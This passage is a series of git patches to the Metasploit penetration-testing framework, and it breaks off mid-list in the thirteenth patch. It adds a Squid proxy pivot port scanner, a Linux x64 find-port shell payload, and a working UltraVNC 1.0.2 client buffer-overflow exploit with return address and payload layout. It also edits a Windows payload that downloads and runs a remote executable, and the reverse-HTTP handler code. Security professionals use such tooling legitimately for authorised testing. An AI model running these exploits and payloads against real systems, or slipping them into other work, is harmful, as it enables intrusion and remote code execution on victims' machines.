From 0f17bbdfdd91cf21bdf2d93652e5fb0b0fa4e5b7 Mon Sep 17 00:00:00 2001 From: Willis Vandevanter Date: Tue, 6 Mar 2012 00:30:30 -0500 Subject: [PATCH 01/46] squid pivot scanning module --- .../scanner/http/squid_pivot_scanning.rb | 130 ++++++++++++++++++ 1 file changed, 130 insertions(+) create mode 100644 modules/auxiliary/scanner/http/squid_pivot_scanning.rb diff --git a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb new file mode 100644 index 0000000000..b6471c55af --- /dev/null +++ b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb @@ -0,0 +1,130 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex/socket/range_walker' + +class Metasploit3 < Msf::Auxiliary + + # Exploit mixins should be called first + include Msf::Exploit::Remote::HttpClient + # Scanner mixin should be near last + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize + super( + 'Name' => 'Squid Proxy Port Scanner', + 'Description' => %q{ + A misconfigured Squid proxy can allow an attacker to make requests on their behalf. + This may give the attacker information about devices that they cannot reach but the + squid proxy can. For example, an attacker can make requests for internal IP addresses + against a misconfigurated open squid proxy exposed to the Internet therefore performing + an internal port scan. The error messages returned by the proxy are used to determine + if the port is open or not. Many squid proxies use custom error codes so your mileage + may vary. + }, + 'Author' => ['willis'], + 'Version' => '$Revision$', + 'References' => + [ + 'URL','http://wiki.squid-cache.org/SquidFaq/SecurityPitfalls' + ], + + 'License' => MSF_LICENSE + ) + + register_options( + [ + OptString.new('RANGE', [true, "IPs to scan through squid proxy", '']), + OptString.new('PORTS', [true, "Ports to scan; must be TCP", "21,80,139,443,445,1433,1521,1723,3389,8080,9100"]), + OptBool.new('MANUAL_CHECK',[true,"Stop the scan if server seems to answer positively to every request",true]) + ], self.class) + + end + + def run_host(target_host) + + begin + iplist = Rex::Socket::RangeWalker.new(datastore['RANGE']) + dead = false + vprint_status("#{iplist.length} total IPs") + portlist = Rex::Socket.portspec_crack(datastore['PORTS']) + + iplist.each do |target| + portlist.each do |port| + next if dead + + vprint_status("[#{rhost}] Running test check") + #request a non-existent page first to make sure the server doesn't respond with a 200 to everything. + res = send_request_cgi({ + 'uri' => "http://127.0.11.1:80", + 'method' => 'GET', + 'data' => '', + 'version' => '1.0', + 'vhost' => '' + }, 10) + + if res and res.body and (res.code == 200) + print_error("#{rhost} likely answers positively to every request, check it manually.") + print_error("\t\t Proceeding with the scan may increase false positives.") + manual = true + end + + next if manual and datastore['MANUAL_CHECK'] + + vprint_status("[#{rhost}] Checking #{target}:#{port}") + if port==443 + res = send_request_cgi({ + 'uri' => "https://#{target}:#{port}", + 'method' => 'GET', + 'data' => '', + 'version' => '1.0', + 'vhost' => '' + }, 10) + else + res = send_request_cgi({ + 'uri' => "http://#{target}:#{port}", + 'method' => 'GET', + 'data' => '', + 'version' => '1.0', + 'vhost' => '' + }, 10) + end + + if res and res.body + + if res.code == 200 or res.body =~ /Zero/ or res.code == 404 or res.code == 401 + print_good("[#{rhost}] #{target}:#{port} seems OPEN") + report_service(:host => target, :port => port, :name => "unknown", :info => res.body ) + end + if res.body =~ /No route to host/ + dead = true + print_bad("[#{rhost}] #{target} is DEAD") + end + + print_status("[#{rhost}] #{target}:#{port} blocked by ACL") if res.body =~ /Access control/ + + if res.body =~ /Connection refused/ or res.body =~ /service not listening/ + report_host(:host => target) + print_good("[#{rhost}] #{target} is alive but #{port} is CLOSED") + end + end + end + dead = false + end + + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + rescue ::Timeout::Error, ::Errno::EPIPE + + end + end +end From 461a59e28d6667fc770c8a2353faf599266c3298 Mon Sep 17 00:00:00 2001 From: Willis Vandevanter Date: Tue, 6 Mar 2012 00:48:54 -0500 Subject: [PATCH 02/46] modified description and lowered the number of required requests --- .../scanner/http/squid_pivot_scanning.rb | 54 ++++++++++--------- 1 file changed, 29 insertions(+), 25 deletions(-) diff --git a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb index b6471c55af..e1de4e497c 100644 --- a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb +++ b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb @@ -26,11 +26,13 @@ class Metasploit3 < Msf::Auxiliary 'Description' => %q{ A misconfigured Squid proxy can allow an attacker to make requests on their behalf. This may give the attacker information about devices that they cannot reach but the - squid proxy can. For example, an attacker can make requests for internal IP addresses - against a misconfigurated open squid proxy exposed to the Internet therefore performing + Squid proxy can. For example, an attacker can make requests for internal IP addresses + against a misconfigurated open Squid proxy exposed to the Internet therefore performing an internal port scan. The error messages returned by the proxy are used to determine - if the port is open or not. Many squid proxies use custom error codes so your mileage - may vary. + if the port is open or not. Many Squid proxies use custom error codes so your mileage + may vary. The open_proxy module can be used to test for open proxies though a Squid proxy + does not have to be open in order to allow for pivoting (e.g. an Intranet Squid proxy which allows + the attack to pivot to another part of the network). }, 'Author' => ['willis'], 'Version' => '$Revision$', @@ -44,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ - OptString.new('RANGE', [true, "IPs to scan through squid proxy", '']), + OptString.new('RANGE', [true, "IPs to scan through Squid proxy", '']), OptString.new('PORTS', [true, "Ports to scan; must be TCP", "21,80,139,443,445,1433,1521,1723,3389,8080,9100"]), OptBool.new('MANUAL_CHECK',[true,"Stop the scan if server seems to answer positively to every request",true]) ], self.class) @@ -56,32 +58,34 @@ class Metasploit3 < Msf::Auxiliary begin iplist = Rex::Socket::RangeWalker.new(datastore['RANGE']) dead = false - vprint_status("#{iplist.length} total IPs") portlist = Rex::Socket.portspec_crack(datastore['PORTS']) + vprint_status("[#{rhost}] Verifying manual testing is not required...") + + manual = false + #request a non-existent page first to make sure the server doesn't respond with a 200 to everything. + res_test = send_request_cgi({ + 'uri' => "http://127.0.11.1:80", + 'method' => 'GET', + 'data' => '', + 'version' => '1.0', + 'vhost' => '' + }, 10) + + if res_test and res_test.body and (res_test.code == 200) + print_error("#{rhost} likely answers positively to every request, check it manually.") + print_error("\t\t Proceeding with the scan may increase false positives.") + manual = true + end + + iplist.each do |target| + next if manual and datastore['MANUAL_CHECK'] + portlist.each do |port| next if dead - vprint_status("[#{rhost}] Running test check") - #request a non-existent page first to make sure the server doesn't respond with a 200 to everything. - res = send_request_cgi({ - 'uri' => "http://127.0.11.1:80", - 'method' => 'GET', - 'data' => '', - 'version' => '1.0', - 'vhost' => '' - }, 10) - - if res and res.body and (res.code == 200) - print_error("#{rhost} likely answers positively to every request, check it manually.") - print_error("\t\t Proceeding with the scan may increase false positives.") - manual = true - end - - next if manual and datastore['MANUAL_CHECK'] - - vprint_status("[#{rhost}] Checking #{target}:#{port}") + vprint_status("[#{rhost}] Requesting #{target}:#{port}") if port==443 res = send_request_cgi({ 'uri' => "https://#{target}:#{port}", From f91b89437545305837c8e8d069a24fce702ab5b8 Mon Sep 17 00:00:00 2001 From: Maciej Kotowicz Date: Wed, 14 Mar 2012 22:39:56 +0100 Subject: [PATCH 03/46] added posibilities for generating payload from asm to more arch's added linux/x64/shell_find_port payload --- lib/msf/core/payload.rb | 10 ++- .../singles/linux/x64/shell_find_port.rb | 87 +++++++++++++++++++ 2 files changed, 95 insertions(+), 2 deletions(-) create mode 100644 modules/payloads/singles/linux/x64/shell_find_port.rb diff --git a/lib/msf/core/payload.rb b/lib/msf/core/payload.rb index 7610cc2164..45a7bf75ed 100644 --- a/lib/msf/core/payload.rb +++ b/lib/msf/core/payload.rb @@ -528,11 +528,17 @@ protected end # Assemble the payload from the assembly - sc = Metasm::Shellcode.assemble(Metasm::Ia32.new, asm).encoded + cpu = case module_info['Arch'] + when ARCH_X86 then Metasm::Ia32.new + when ARCH_X86_64 then Metasm::X86_64.new + when ARCH_PPC then Metasm::PowerPC.new + when ARCH_ARMLE then Metasm::ARM.new + end + sc = Metasm::Shellcode.assemble(cpu, asm).encoded # Calculate the actual offsets now that it's been built off.each_pair { |option, val| - off[option] = [ sc.offset_of_reloc(option), val[1] ] + off[option] = [ sc.offset_of_reloc(option) || val[0], val[1] ] } # Cache the payload blob diff --git a/modules/payloads/singles/linux/x64/shell_find_port.rb b/modules/payloads/singles/linux/x64/shell_find_port.rb new file mode 100644 index 0000000000..0273527c01 --- /dev/null +++ b/modules/payloads/singles/linux/x64/shell_find_port.rb @@ -0,0 +1,87 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'msf/core/handler/find_port' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Single + include Msf::Payload::Linux + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Linux Command Shell, Find Port Inline', + 'Version' => '$Revision$', + 'Description' => 'Spawn a shell on an established connection', + 'Author' => 'mak', + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'Arch' => ARCH_X86_64, + 'Handler' => Msf::Handler::FindPort, + 'Session' => Msf::Sessions::CommandShellUnix, + 'Payload' => + { + 'Offsets' => + { + 'CPORT' => [ 29, 'n' ], + }, + + 'Assembly' => < Date: Thu, 15 Mar 2012 16:21:00 +0100 Subject: [PATCH 04/46] fix little mistake --- modules/payloads/singles/linux/x64/shell_find_port.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/payloads/singles/linux/x64/shell_find_port.rb b/modules/payloads/singles/linux/x64/shell_find_port.rb index 0273527c01..5b574a07d7 100644 --- a/modules/payloads/singles/linux/x64/shell_find_port.rb +++ b/modules/payloads/singles/linux/x64/shell_find_port.rb @@ -35,7 +35,7 @@ module Metasploit3 { 'Offsets' => { - 'CPORT' => [ 29, 'n' ], + 'CPORT' => [ 32, 'n' ], }, 'Assembly' => < Date: Wed, 21 Mar 2012 22:02:46 +0100 Subject: [PATCH 05/46] Added Base32 Support --- lib/rex/text.rb | 80 ++++++++++++++++++++++++++++++++++++++++++++++++- 1 file changed, 79 insertions(+), 1 deletion(-) diff --git a/lib/rex/text.rb b/lib/rex/text.rb index d18ba7ced3..98fbe756fe 100644 --- a/lib/rex/text.rb +++ b/lib/rex/text.rb @@ -32,6 +32,7 @@ module Text UpperAlpha = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" LowerAlpha = "abcdefghijklmnopqrstuvwxyz" Numerals = "0123456789" + Base32 = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567" Alpha = UpperAlpha + LowerAlpha AlphaNumeric = Alpha + Numerals HighAscii = [*(0x80 .. 0xff)].pack("C*") @@ -692,6 +693,83 @@ module Text # ## + # + # Base32 code + # + + # Based on --> https://github.com/stesla/base32 + + # Copyright (c) 2007-2011 Samuel Tesla + + # Permission is hereby granted, free of charge, to any person obtaining a copy + # of this software and associated documentation files (the "Software"), to deal + # in the Software without restriction, including without limitation the rights + # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + # copies of the Software, and to permit persons to whom the Software is + # furnished to do so, subject to the following conditions: + + # The above copyright notice and this permission notice shall be included in + # all copies or substantial portions of the Software. + + # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + # THE SOFTWARE. + + + # + # Base32 encoder + # + def self.b32encode(bytes_in) + n = (bytes_in.length * 8.0 / 5.0).ceil + p = n < 8 ? 5 - (bytes_in.length * 8) % 5 : 0 + c = bytes_in.inject(0) {|m,o| (m << 8) + o} << p + [(0..n-1).to_a.reverse.collect {|i| Base32[(c >> i * 5) & 0x1f].chr}, + ("=" * (8-n))] + end + + def self.encode_base32(str) + bytes = str.bytes + result = '' + size= 5 + while bytes.any? do + bytes.each_slice(size) do |a| + bytes_out = b32encode(a).flatten.join + result << bytes_out + bytes = bytes.drop(size) + end + end + return result + end + + # + # Base32 decoder + # + def self.b32decode(bytes_in) + bytes = bytes_in.take_while {|c| c != 61} # strip padding + n = (bytes.length * 5.0 / 8.0).floor + p = bytes.length < 8 ? 5 - (n * 8) % 5 : 0 + c = bytes.inject(0) {|m,o| (m << 5) + Base32.index(o.chr)} >> p + (0..n-1).to_a.reverse.collect {|i| ((c >> i * 8) & 0xff).chr} + end + + def self.decode_base32(str) + bytes = str.bytes + result = '' + size= 8 + while bytes.any? do + bytes.each_slice(size) do |a| + bytes_out = b32decode(a).flatten.join + result << bytes_out + bytes = bytes.drop(size) + end + end + return result + end + # # Base64 encoder # @@ -1217,7 +1295,7 @@ protected def self.checksum8(str) str.unpack("C*").inject(:+) % 0x100 end - + def self.checksum16_le(str) str.unpack("v*").inject(:+) % 0x10000 end From 135cf7ba0473ef3287d6f95fae27ed0834a2606a Mon Sep 17 00:00:00 2001 From: Jonathan Cran Date: Fri, 23 Mar 2012 17:00:04 -0500 Subject: [PATCH 06/46] remove trailing comma, thanks troulouliou --- modules/auxiliary/admin/hp/hp_data_protector_cmd.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb b/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb index cd1699d434..9dd65c6a71 100644 --- a/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb +++ b/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb @@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary 'sinn3r' ], 'License' => MSF_LICENSE, - 'DisclosureDate' => "Feb 7 2011", + 'DisclosureDate' => "Feb 7 2011" )) register_options( @@ -96,4 +96,4 @@ class Metasploit3 < Msf::Auxiliary end end -end \ No newline at end of file +end From d8ddb19b569ace4702e9792e4a7dd7e5de5960ac Mon Sep 17 00:00:00 2001 From: Kurtis Miller Date: Sun, 25 Mar 2012 00:14:19 -0700 Subject: [PATCH 07/46] cve-2008-0610 windows exploit module --- modules/exploits/windows/vnc/cve-2008-0610.rb | 79 +++++++++++++++++++ 1 file changed, 79 insertions(+) create mode 100644 modules/exploits/windows/vnc/cve-2008-0610.rb diff --git a/modules/exploits/windows/vnc/cve-2008-0610.rb b/modules/exploits/windows/vnc/cve-2008-0610.rb new file mode 100644 index 0000000000..dba627c3ed --- /dev/null +++ b/modules/exploits/windows/vnc/cve-2008-0610.rb @@ -0,0 +1,79 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::TcpServer + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'UltraVNC 1.0.2 Client Buffer Overflow', + 'Description' => %q{ + This module exploits a buffer overflow in UltraVNC Win32 + Viewer 1.0.2 Release. + + If a malicious server responds to a client connection indicating a minor + protocol version of 14 or 16, a 32-bit integer is subsequently read from + the TCP stream by the client and directly provided as the trusted size for + further reading from the TCP stream into a 1024-byte character array on + the stack. + }, + 'Author' => 'noperand', + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + [ 'CVE', '2008-0610' ], + [ 'OSVDB', '42840' ], + [ 'BID', '27561' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Payload' => + { + 'Space' => 500, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows XP SP3', { 'Ret' => 0x00421a61 } ], + ], + 'Privileged' => false, + 'DisclosureDate' => 'Feb 6 2008', + 'DefaultTarget' => 0)) + + register_options( + [ + OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ]) + ], self.class) + end + + def on_client_connect(client) + return if ((p = regenerate_payload(client)) == nil) + + sploit = rand_text_alpha(1100) # junk, could be more efficient here + sploit << "\x00\x04\x00\x00" # value to get around a write + sploit << rand_text_alpha(12) # random junk + sploit << "\xEB\x06\x90\x90" # short relative jump + sploit << [target.ret].pack('V') # pop/pop/ret (default is in vncviewer) + sploit << payload.encoded + + sploit = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x31\x36\x0a" << [sploit.length].pack('N') << sploit + + print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...") + client.put(sploit) + handler(client) + service.close_client(client) + end +end From 7ea37253a0edc1c7664cd18a3a7479163109991d Mon Sep 17 00:00:00 2001 From: Kurtis Miller Date: Sun, 25 Mar 2012 09:04:35 -0700 Subject: [PATCH 08/46] modifications recommended by sinn3r --- .../windows/vnc/{cve-2008-0610.rb => ultravnc_viewer_bof.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/exploits/windows/vnc/{cve-2008-0610.rb => ultravnc_viewer_bof.rb} (100%) diff --git a/modules/exploits/windows/vnc/cve-2008-0610.rb b/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb similarity index 100% rename from modules/exploits/windows/vnc/cve-2008-0610.rb rename to modules/exploits/windows/vnc/ultravnc_viewer_bof.rb From e2606764cbe4bdd8b9c344077ef9fb4e83c34ce3 Mon Sep 17 00:00:00 2001 From: Kurtis Miller Date: Sun, 25 Mar 2012 09:08:38 -0700 Subject: [PATCH 09/46] forgot to add renamed module --- .../windows/vnc/ultravnc_viewer_bof.rb | 34 ++++++++++++++----- 1 file changed, 25 insertions(+), 9 deletions(-) diff --git a/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb b/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb index dba627c3ed..4dd150fe38 100644 --- a/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb +++ b/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb @@ -16,10 +16,9 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'UltraVNC 1.0.2 Client Buffer Overflow', + 'Name' => 'UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow', 'Description' => %q{ - This module exploits a buffer overflow in UltraVNC Win32 - Viewer 1.0.2 Release. + This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release. If a malicious server responds to a client connection indicating a minor protocol version of 14 or 16, a 32-bit integer is subsequently read from @@ -47,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP3', { 'Ret' => 0x00421a61 } ], + [ 'Windows XP SP3', { 'Ret' => 0x00421a61 } ], # vncviewer.exe, 1.0.2 ], 'Privileged' => false, 'DisclosureDate' => 'Feb 6 2008', @@ -62,13 +61,30 @@ class Metasploit3 < Msf::Exploit::Remote def on_client_connect(client) return if ((p = regenerate_payload(client)) == nil) - sploit = rand_text_alpha(1100) # junk, could be more efficient here - sploit << "\x00\x04\x00\x00" # value to get around a write - sploit << rand_text_alpha(12) # random junk - sploit << "\xEB\x06\x90\x90" # short relative jump - sploit << [target.ret].pack('V') # pop/pop/ret (default is in vncviewer) + sploit = rand_text_alpha(1100) # junk, could be more efficient here + sploit << "\x00\x04\x00\x00" # value to get around a write + sploit << rand_text_alpha(12) # random junk + sploit << "\xEB\x06" << make_nops(2) # short relative jump + sploit << [target.ret].pack('V') # pop/pop/ret (default is in vncviewer.exe) sploit << payload.encoded +=begin + We prepend the initial 12 bytes including the servers' desired protocol version ("RFB 003.016"). + - These bytes are read directly by a call to ReadExact() with a size of 12. + + ... + if (m_minorVersion == 14 || m_minorVersion == 16) + { + int size; + ReadExact((char *)&size,sizeof(int)); + char mytext[1024]; //10k + ReadExact(mytext,size); + mytext[size]=0; + ... + + If minor version is 16 or 14, a 32-bit integer follows indicating the size of our data to read. + We then append our data. +=end sploit = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x31\x36\x0a" << [sploit.length].pack('N') << sploit print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...") From ad32911b1a97791c0bd49f49a21367d2ca1fc883 Mon Sep 17 00:00:00 2001 From: corelanc0d3r Date: Mon, 26 Mar 2012 12:30:03 +0200 Subject: [PATCH 10/46] probably safer to use regex --- modules/payloads/singles/windows/download_exec_https.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/payloads/singles/windows/download_exec_https.rb b/modules/payloads/singles/windows/download_exec_https.rb index 76d7b97f3b..f10f51eaf7 100644 --- a/modules/payloads/singles/windows/download_exec_https.rb +++ b/modules/payloads/singles/windows/download_exec_https.rb @@ -92,12 +92,12 @@ module Metasploit3 if target_uri.length > 0 # get desired protocol - if target_uri.start_with?'http://' + if target_uri =~ /^http:/ proto = "http" port_nr = 80 dwflags_asm = "push (0x80000000 | 0x04000000 | 0x00200000 |0x00001000 |0x00002000 |0x00000200) ; dwFlags\n" end - if target_uri.start_with?'ftp://' + if target_uri =~ /^ftp:/ proto = "ftp" port_nr = 21 dwflags_asm = "push (0x80000000 | 0x04000000 | 0x00200000 |0x00001000 |0x00002000 |0x00000200) ; dwFlags\n" From 182f3744de428c772c1dd2c0515db3b81ca73f15 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 26 Mar 2012 09:23:14 -0500 Subject: [PATCH 11/46] Cosmetic cleanup --- .../singles/windows/download_exec_https.rb | 145 +++++++++--------- 1 file changed, 71 insertions(+), 74 deletions(-) diff --git a/modules/payloads/singles/windows/download_exec_https.rb b/modules/payloads/singles/windows/download_exec_https.rb index f10f51eaf7..5b945b969e 100644 --- a/modules/payloads/singles/windows/download_exec_https.rb +++ b/modules/payloads/singles/windows/download_exec_https.rb @@ -12,7 +12,6 @@ require 'msf/core' - module Metasploit3 include Msf::Payload::Windows @@ -58,10 +57,10 @@ module Metasploit3 #;0x00000200 ; INTERNET_FLAG_NO_UI" exitfuncs = { - "PROCESS" => 0x56A2B5F0, #kernel32.dll!ExitProcess - "THREAD" => 0x0A2A1DE0, #kernel32.dll!ExitThread - "SEH" => 0x00000000, #we don't care - "NONE" => 0x00000000 #we don't care + "PROCESS" => 0x56A2B5F0, #kernel32.dll!ExitProcess + "THREAD" => 0x0A2A1DE0, #kernel32.dll!ExitThread + "SEH" => 0x00000000, #we don't care + "NONE" => 0x00000000 #we don't care } protoflags = { @@ -85,9 +84,9 @@ module Metasploit3 # - port # - /path/to/file - server_uri = '' + server_uri = '' server_host = '' - port_nr = 443 # default + port_nr = 443 # default if target_uri.length > 0 @@ -97,6 +96,7 @@ module Metasploit3 port_nr = 80 dwflags_asm = "push (0x80000000 | 0x04000000 | 0x00200000 |0x00001000 |0x00002000 |0x00000200) ; dwFlags\n" end + if target_uri =~ /^ftp:/ proto = "ftp" port_nr = 21 @@ -107,7 +107,7 @@ module Metasploit3 target_uri = target_uri.gsub('http://','') #don't care about protocol target_uri = target_uri.gsub('https://','') #don't care about protocol target_uri = target_uri.gsub('ftp://','') #don't care about protocol - + server_info = target_uri.split("/") # did user specify a port ? @@ -120,7 +120,6 @@ module Metasploit3 server_host = server_parts[0] # get /path/to/remote/exe - for i in (1..server_info.length-1) server_uri << "/" @@ -130,8 +129,6 @@ module Metasploit3 end # get protocol specific stuff - - #create actual payload payload_data = < 300 - push eax ; read length - push ecx ; target buffer on stack - push esi ; hRequest - push 0xE2899612 ; hash( "wininet.dll", "InternetReadFile" ) + mov ah,0x03 ; eax => 300 + push eax ; read length + push ecx ; target buffer on stack + push esi ; hRequest + push 0xE2899612 ; hash( "wininet.dll", "InternetReadFile" ) call ebp - test eax,eax ; download failed? (optional?) - jz thats_all_folks ; failure -> exit + test eax,eax ; download failed? (optional?) + jz thats_all_folks ; failure -> exit - pop eax ; how many bytes did we retrieve ? + pop eax ; how many bytes did we retrieve ? - test eax,eax ; optional? - je close_and_run ; continue until it returns 0 + test eax,eax ; optional? + je close_and_run ; continue until it returns 0 write_to_file: - push 0 ; lpOverLapped - push esp ; lpNumberOfBytesWritten - push eax ; nNumberOfBytesToWrite - lea eax,[esp+0xc] ; get pointer to buffer - push eax ; lpBuffer - push ebx ; hFile - push 0x5BAE572D ; kernel32.dll!WriteFile + push 0 ; lpOverLapped + push esp ; lpNumberOfBytesWritten + push eax ; nNumberOfBytesToWrite + lea eax,[esp+0xc] ; get pointer to buffer + push eax ; lpBuffer + push ebx ; hFile + push 0x5BAE572D ; kernel32.dll!WriteFile call ebp - sub esp,4 ; set stack back to where it was + sub esp,4 ; set stack back to where it was jmp download_more close_and_run: push ebx - push 0x528796C6 ; kernel32.dll!CloseHandle + push 0x528796C6 ; kernel32.dll!CloseHandle call ebp execute_file: - push 0 ; don't show - push edi ; lpCmdLine - push 0x876F8B31 ; kernel32.dll!WinExec + push 0 ; don't show + push edi ; lpCmdLine + push 0x876F8B31 ; kernel32.dll!WinExec call ebp thats_all_folks: From 507dd423cec540285f738c42bc6de81a8a9de242 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 26 Mar 2012 10:41:50 -0500 Subject: [PATCH 12/46] Rogue period, DELETED. --- modules/auxiliary/admin/hp/hp_data_protector_cmd.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb b/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb index 9dd65c6a71..406d13205c 100644 --- a/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb +++ b/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb @@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary When an EXEC_CMD packet is sent, omniinet.exe will attempt to look for that user-supplied filename with kernel32!FindFirstFileW(). If the file - is found, the process will then go ahead execute it with CreateProcess(). + is found, the process will then go ahead execute it with CreateProcess() under a new thread. If the filename isn't found, FindFirstFileW() will throw an error (0x03), and then bails early without triggering CreateProcess(). From 7161a548f4259032f5cef8d97f38915aaa6344db Mon Sep 17 00:00:00 2001 From: hdm Date: Mon, 26 Mar 2012 11:49:51 -0500 Subject: [PATCH 13/46] Precalculate some uri strings in case the 1000-round generation fails --- lib/msf/core/handler/reverse_http.rb | 15 ++++++++++++--- lib/msf/core/handler/reverse_https.rb | 13 +++++++++++-- 2 files changed, 23 insertions(+), 5 deletions(-) diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index dc241353cc..fe1a7d78a9 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb @@ -36,7 +36,12 @@ module ReverseHttp URI_CHECKSUM_INITW = 92 URI_CHECKSUM_INITJ = 88 URI_CHECKSUM_CONN = 98 - + + # + # Precalculated checkums as fallback + # + URI_CHECKSUM_PRECALC = ["Zjjaq", "pIlfv", "UvoxP", "sqnx9", "zvoVO", "Pajqy", "7ziuw", "vecYp", "yfHsn", "YLzzp", "cEzvr", "abmri", "9tvwr", "vTarp", "ocrgc", "mZcyl", "xfcje", "nihqa", "40F17", "zzTWt", "E3192", "wygVh", "pbqij", "rxdVs", "ajtsf", "wvuOh", "hwRwr", "pUots", "rvzoK", "vUwby", "tLzyk", "zxbuV", "niaoy", "ukxtU", "vznoU", "zuxyC", "ymvag", "Jxtxw", "404KC", "DE563", "0A7G9", "yorYv", "zzuqP", "czhwo", "949N8", "a1560", "5A2S3", "Q652A", "KR201", "uixtg", "U0K02", "4EO56", "H88H4", "5M8E6", "zudkx", "ywlsh", "luqmy", "09S4I", "L0GG0", "V916E", "KFI11", "A4BN8", "C3E2Q", "UN804", "E75HG", "622eB", "1OZ71", "kynyx", "0RE7F", "F8CR2", "1Q2EM", "txzjw", "5KD1S", "GLR40", "11BbD", "MR8B2", "X4V55", "W994P", "13d2T", "6J4AZ", "HD2EM", "766bL", "8S4MF", "MBX39", "UJI57", "eIA51", "9CZN2", "WH6AA", "a6BF9", "8B1Gg", "J2N6Z", "144Kw", "7E37v", "9I7RR", "PE6MF", "K0c4M", "LR3IF", "38p3S", "39ab3", "O0dO1", "k8H8A", "0Fz3B", "o1PE1", "h7OI0", "C1COb", "bMC6A", "8fU4C", "3IMSO", "8DbFH", "2YfG5", "bEQ1E", "MU6NI", "UCENE", "WBc0E", "T1ATX", "tBL0A", "UGPV2", "j3CLI", "7FXp1", "yN07I", "YE6k9", "KTMHE", "a7VBJ", "0Uq3R", "70Ebn", "H2PqB", "83edJ", "0w5q2", "72djI", "wA5CQ", "KF0Ix", "i7AZH", "M9tU5", "Hs3RE", "F9m1i", "7ecBF", "zS31W", "lUe21", "IvCS5", "j97nC", "CNtR5", "1g8gV", "7KwNG", "DB7hj", "ORFr7", "GCnUD", "K58jp", "5lKo8", "GPIdP", "oMIFJ", "2xYb1", "LQQPY", "FGQlN", "l5COf", "dA3Tn", "v9RWC", "VuAGI", "3vIr9", "aO3zA", "CIfx5", "Gk6Uc", "pxL94", "rKYJB", "TXAFp", "XEOGq", "aBOiJ", "qp6EJ", "YGbq4", "dR8Rh", "g0SVi", "iMr6L", "HMaIl", "yOY1Z", "UXr5Y", "PJdz6", "OQdt7", "EmZ1s", "aLIVe", "cIeo2", 